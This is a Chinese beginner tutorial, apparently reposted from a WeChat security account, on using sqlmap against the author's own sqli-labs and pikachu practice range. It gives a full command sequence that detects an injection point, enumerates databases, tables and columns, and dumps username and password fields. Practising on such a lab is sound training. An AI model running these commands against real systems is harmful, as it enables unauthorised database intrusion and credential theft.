新手学习sqlmap入门这一篇就够了,注入实操

admin 2023年1月30日21:26:33评论12 views字数 1164阅读3分52秒阅读模式

前言:

Sqlmap我想大部分都很熟悉,这里简单介绍一下,帮不太熟悉的朋友简单了解一下。众所周知,top10名列前茅的漏洞就是注入漏洞,任何一个学习web渗透测试的朋友都需要了解的一个内容,注入分为手工注入和自动工具注入,而sqlmap就是自动工具中最好用的工具。那么直接进入主题。

这里我们使用靶场sql-labpikachu

http://wangehacker.cn/thanks.html

 靶场提供在我们的官网上,免费使用,免去一些新手的烦恼。

正文:

一、基本使用方式

首先我们要了解一下我们正常的注入的一个命令流程,我这里先演示最基本的一套流程

1、检测目标地址是否存在注入点。

这里使用的地址是我们网站的

http://wangehacker.cn/sqli-labs/Less-1/

这里我们需要在后面加上?id=1的传参

新手学习sqlmap入门这一篇就够了,注入实操

这里我们将这个网址直接扔到sqlmap中运行检测

s

qlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch

解释--batch是后面有一些选项我们选择默认选项

这里的命令是在kali中运行的,如果大家在Windows安装的sqlmap区别在红色部分

python sqlmap.py -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch

新手学习sqlmap入门这一篇就够了,注入实操

这里就代表存在着注入漏洞,我们就需要进行下一步步骤,我们扫库名

2、检测数据库中的库名

我们使用命令

sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch --dbs

新手学习sqlmap入门这一篇就够了,注入实操

3、选择需要爆的库开始爆表名

使用命令选择我们需要爆破的库名,开始爆库中的表

sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch -D pikachu --tables

新手学习sqlmap入门这一篇就够了,注入实操

这里我们顺利拿到表名

4、指定库名,表名爆破字段

使用命令:

sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch -D pikachu -T users --columns

新手学习sqlmap入门这一篇就够了,注入实操

5、选择字段爆破字段中的内容

使用命令:

sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch -D pikachu -T users -C username,password --dump

新手学习sqlmap入门这一篇就够了,注入实操

这里我们的sqlmap会对一些简单的md5加密值进行破解。到这里五步我们的基本使用方式就已经完成了,下面我们利用pikachu靶场练习不同类型的注入。

原文始发于微信公众号(白安全组):新手学习sqlmap入门这一篇就够了,注入实操

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月30日21:26:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   新手学习sqlmap入门这一篇就够了,注入实操https://cn-sec.com/archives/1348422.html

发表评论

匿名网友 填写信息